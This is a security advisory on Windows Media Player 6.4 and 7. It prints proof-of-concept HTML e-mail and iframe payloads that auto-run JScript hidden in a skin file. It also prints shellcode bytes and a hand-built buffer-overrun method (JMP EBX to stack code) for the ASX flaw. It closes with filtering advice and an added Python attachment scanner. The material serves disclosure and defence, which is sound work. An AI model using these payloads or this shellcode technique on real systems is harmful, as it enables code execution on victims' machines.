COMMAND
MS Media
SYSTEMS AFFECTED
MS Media Player 6.4, 7 (installed by default on WinME)
PROBLEM
The following is based on a GFI Security Lab advisory. GFI, a developer of
e-mail content checking and network security software, has recently
discovered a security flaw in Windows Media Player which allows a
malicious user to run arbitrary code on a target machine when it views a
web site or an HTML e-mail.
The problem is exploited by embedding a JavaScript (.js) file within a
Media Player skin file (.wmz), which can in turn be embedded in a
Windows Media Download file (.wmd). This does not require the user to
run any attachment, since the Media Player file is executed
automatically via an iframe tag or a window.open() call within a
<script> tag.
Proof-of-concept exploit (embedded within an HTML file or e-mail):
E-mail Example 1.
=================
<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  alert('This exploit will now open a new window\n' +
        'and automatically download the wmd file\n' +
        'and execute it. This will create a file named\n' +
        'gfiseclab.txt in your C:\\');
  window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</body>
</Embedded within an HTML e-mail>
E-mail Example 2.
=================
<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download ' +
      'the wmd file \n and execute it. This will create a file named \n ' +
      'gfiseclab.txt in your C:\\');
</script>
<iframe src="http://website/test.wmd"></iframe>
</body>
</html>
test.wmd is a compressed zip file which contains the following
files:
* test.asx: metafile which points to an mpg file and to the
exploit skin file
* test.mpg: an example MPEG movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: the JavaScript file, which contains the following code
************************************
var fso, f1;
// Create C:\gfiseclab.txt via the FileSystemObject: the advisory's proof
// that script inside the skin runs with access to the local file system.
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
// Skin load handler; playAgain() is not defined in this snippet.
function onload(){
  playAgain();
}
************************************
* test.wms: another metafile which calls test.js
The following is based on an @stake Security Advisory. Microsoft Windows
Media Player plays streaming media files which have the extension
.ASX. There is a buffer overrun caused by the way WMP handles the .ASX
file format when the Web View option in Windows Explorer (enabled by
default) is used. This problem can allow the execution of arbitrary
code.
One method of exploitation requires the user to save the .ASX file to
the local machine and navigate to it in Explorer. Single-clicking the
file causes Explorer to auto-preview the destination streaming media
file specified in the .ASX file. Passing an overly long destination for
this media file causes the buffer overrun to occur and the arbitrary
code to execute.
This is another good example of why attachments from unknown sources
should not be trusted, and of why systems and network administrators
should evaluate the types of attachments that are allowed to reach
users' desktops, even those that may not contain any executable code.
There are other methods of exploitation which could allow .ASX
files to be opened automatically when a user visits a malicious
web site. This can be prevented by configuring Internet Explorer
not to run ActiveX controls.
The file linked below, once uncompressed, contains
'Explorer-Win2k-BufferOverrun.asx'. Once this file is previewed in
Explorer with a single click, it will cause Explorer to create a file in
the root of C: called !test!. This file will contain a directory listing
of the current working directory at the time the proof of concept is
executed. Once the proof of concept has run, Explorer.exe will need to
be restarted.
This example has been hard-coded to work with Windows 2000 (SP1) and
MSVCRT.DLL v6.1.8637. Another reason the example is service-pack
specific is that the code is randomly located on the stack (so EIP
cannot be pointed directly at the location of the arbitrary code); EBX
is located 4 bytes before EIP. The example overwrites EIP with the
address of a JMP EBX (FF E2; this instruction is contained in kernel32
and is thus static). This in turn tries to execute the value at EBX
(which contains NOPs), then EIP (which luckily does not contain any code
that alters or stops program flow), and finally executes the arbitrary
code placed on the stack. The assembly code executed by this example at
this point is given at the end of this advisory. Within the ASX file the
example code is located at offset 00005ce4h.
An ASX file which contains the problem is contained in this .zip
file:
http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip
<-----<Assembly code for proof of concept>-----
[Byte Code] [Assembly]
90 nop
8B DC mov ebx,esp
8B E3 mov esp,ebx
53 push ebx
8B DC mov ebx,esp
33 FF xor edi,edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
57 push edi
C6 43 E9 63 mov byte ptr [ebx-17h],63h
C6 43 EA 6D mov byte ptr [ebx-16h],6Dh
C6 43 EB 64 mov byte ptr [ebx-15h],64h
C6 43 EC 2E mov byte ptr [ebx-14h],2Eh
C6 43 ED 65 mov byte ptr [ebx-13h],65h
C6 43 EE 78 mov byte ptr [ebx-12h],78h
C6 43 EF 65 mov byte ptr [ebx-11h],65h
C6 43 F0 2F mov byte ptr [ebx-10h],2Fh
C6 43 F1 63 mov byte ptr [ebx-0Fh],63h
C6 43 F2 64 mov byte ptr [ebx-0Eh],64h
C6 43 F3 69 mov byte ptr [ebx-0Dh],69h
C6 43 F4 72 mov byte ptr [ebx-0Ch],72h
C6 43 F5 3E mov byte ptr [ebx-0Bh],3Eh
C6 43 F6 63 mov byte ptr [ebx-0Ah],63h
C6 43 F7 3A mov byte ptr [ebx-9],3Ah
C6 43 F8 5C mov byte ptr [ebx-8],5Ch
C6 43 F9 21 mov byte ptr [ebx-7],21h
C6 43 FA 74 mov byte ptr [ebx-6],74h
C6 43 FB 65 mov byte ptr [ebx-5],65h
C6 43 FC 73 mov byte ptr [ebx-4],73h
C6 43 FD 74 mov byte ptr [ebx-3],74h
C6 43 FE 21 mov byte ptr [ebx-2],21h
B8 AD AA 01 78 mov eax,7801AAADh
50 push eax
8D 43 E9 lea eax,[ebx-17h]
50 push eax
FF 53 E4 call dword ptr [ebx-1Ch]
56 push esi
BB 2D F3 E8 77 mov ebx,77E8F32Dh
FF D3 call ebx
C3 ret
SOLUTION
For e-mail, the best solution is to filter incoming e-mail at the SMTP
server: block WMD and WMZ attachments, and strip JavaScript, iframe
tags, meta refresh tags and possibly ActiveX tags. Users then need not
worry about receiving malicious e-mail and spreading worms.
Consider removing the .wmd and .wmz file associations with Media
Player 7 until a vendor patch is applied.
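The SMTP-level filtering recommended above, applied to the two attachment types this advisory describes (the .wmd/.wmz nesting from the GFI section and the overly long .ASX destination from the @stake section), as an added example that is not code from GFI, @stake or Microsoft. The container and script extensions, the file layout and the ActiveXObject check follow the PROBLEM section; the 260-byte destination threshold, the sample file names and the sample content are this example's assumptions, constructed in memory so the script runs offline:

```python
"""Mail-gateway triage for the Media Player attachment types in this advisory.

Added example, not code from GFI, @stake or Microsoft. A .wmd is a ZIP that
can nest a .wmz skin (also a ZIP) carrying JScript; an .asx metafile can
carry an overly long stream destination. Samples are constructed in memory;
the 260-byte destination threshold is this example's assumption.
"""
import io
import re
import zipfile

CONTAINER_EXTS = (".wmd", ".wmz")  # ZIP-based containers, per the advisory
SCRIPT_EXTS = (".js", ".wms")      # skin script and the metafile that loads it
MAX_REF_LEN = 260                  # assumed; the advisory only says "overly long"

ACTIVEX_RE = re.compile(r"ActiveXObject\s*\(", re.IGNORECASE)
# ASX markup is case-insensitive and often not well-formed XML, so scan it
# tolerantly rather than with an XML parser.
REF_RE = re.compile(r'''<ref\b[^>]*?\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''',
                    re.IGNORECASE)


def asx_refs(text):
    """Return every Ref href destination found in an ASX metafile."""
    return [a or b or c for a, b, c in REF_RE.findall(text)]


def check_asx(text, max_len=MAX_REF_LEN):
    """Describe each ASX destination longer than max_len (the overrun trigger)."""
    return [f"asx ref of {len(r)} bytes exceeds {max_len}"
            for r in asx_refs(text) if len(r) > max_len]


def scan(name, data, depth=0):
    """Return (member_name, reason) findings for one attachment.

    .wmd/.wmz are opened as ZIPs and walked recursively, .asx content gets the
    destination-length check, and nested .js is inspected for ActiveXObject
    use. A bare .js attachment (depth 0) is left to other gateway rules.
    """
    lower = name.lower()
    findings = []
    if lower.endswith(".asx"):
        findings += [(name, reason) for reason in check_asx(data.decode("latin-1"))]
    elif lower.endswith(SCRIPT_EXTS) and depth > 0:
        findings.append((name, "script inside media container"))
        if lower.endswith(".js") and ACTIVEX_RE.search(data.decode("latin-1")):
            findings.append((name, "JScript instantiates ActiveXObject"))
    elif lower.endswith(CONTAINER_EXTS):
        if depth > 2:
            return [(name, "container nesting too deep")]
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    findings += scan(f"{name}/{info.filename}", zf.read(info), depth + 1)
        except zipfile.BadZipFile:
            findings.append((name, "media container is not a valid ZIP"))
    return findings


def should_block(name, data):
    """Gateway decision for one attachment: any finding blocks it."""
    return bool(scan(name, data))


def zip_bytes(members):
    """Build an in-memory ZIP from a {member_name: str_or_bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, content in members.items():
            zf.writestr(member_name, content)
    return buf.getvalue()


# Constructed samples mirroring the layouts the advisory describes; these are
# not the real test.wmd or asx-bufferoverrun.zip contents.
ASX_OK = '<ASX version="3.0"><Entry><Ref href="test.mpg"/></Entry></ASX>'
LONG_REF = "mms://media.example.invalid/" + "A" * 600
ASX_LONG = f'<ASX version="3.0"><ENTRY><REF HREF="{LONG_REF}"/></ENTRY></ASX>'
SKIN_JS = ('var fso, f1;\n'
           'fso = new ActiveXObject("Scripting.FileSystemObject");\n'
           'f1 = fso.CreateTextFile("C:\\\\gfiseclab.txt", true);\n')
FAKE_MPG = b"\x00\x00\x01\xba"  # placeholder bytes, not a real MPEG stream
SAMPLE_WMD = zip_bytes({
    "test.asx": ASX_OK,
    "test.mpg": FAKE_MPG,
    "test.wmz": zip_bytes({"test.js": SKIN_JS,
                           "test.wms": "<!-- constructed skin metafile -->"}),
})
CLEAN_WMD = zip_bytes({"test.asx": ASX_OK, "test.mpg": FAKE_MPG})

if __name__ == "__main__":
    for label, name, data in [("skin exploit", "test.wmd", SAMPLE_WMD),
                              ("clean download", "clean.wmd", CLEAN_WMD),
                              ("long asx ref", "long.asx", ASX_LONG.encode())]:
        print(f"{label}: block={should_block(name, data)} {scan(name, data)}")
```

Running the module prints the decision and findings for the three constructed attachments. In a gateway the should_block() result would drive quarantine of the message, while the findings list gives the analyst the exact member path (for example test.wmd/test.wmz/test.js) that triggered it, which is more useful than the blanket extension block the advisory suggests when .wmd downloads are legitimately in use.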
Patch availability:
- Media Player 6.4: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
- Media Player 7: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067